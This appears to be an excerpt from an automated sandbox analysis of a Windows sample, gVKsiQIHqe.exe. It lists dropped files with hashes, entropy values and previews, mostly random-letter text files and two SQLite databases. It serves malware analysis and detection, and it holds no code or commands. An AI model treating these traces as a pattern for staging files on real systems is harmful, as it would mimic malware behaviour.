                                                                                                                                                                                                                                                                                    Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\EK6XT0

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\EKFKNO

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\G47GDB

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.690071120548773
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                                                                                                                                                                                                                    MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                                                                                                                                                                                                                    SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                                                                                                                                                                                                                    SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                                                                                                                                                                                                                    SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\GLX4O8

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                    MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                    SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                    SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                    SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\GV3W4E

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2654811564768635
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVum8:Bq+n0Jz9ELyKOMq+8y9/OwL
                                                                                                                                                                                                                                                                                    MD5:1012BC5ECA2D716479A2AD45476A6484
                                                                                                                                                                                                                                                                                    SHA1:8B892CAFB4DBD4C076E58944C83C35DABD77963C
                                                                                                                                                                                                                                                                                    SHA-256:6FEA184AC5ED232C6A0470A50C085E2FFED4F7ACEDF2D3A6D7B35CE8615BAB26
                                                                                                                                                                                                                                                                                    SHA-512:56A05CCAF4370BDF0B0D78CF07F1478646F3C98D2ACA0B0BCB19F599F2E8CC7CCDB867D9B95F4DC374A88F80C680DCA40FDC80D40154E6535FD2D5DCC18DB06F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\HD2DTJ

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\IMGDJE

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\J5PP8Q

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\JWBIEC

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\KFUAIW

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.687055908915499
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                                                                                                                                                                                                                                                    MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                                                                                                                                                                                                                                                    SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                                                                                                                                                                                                                                                    SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                                                                                                                                                                                                                                                    SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                                                                                                                                                                                                                                                    Malicious:false
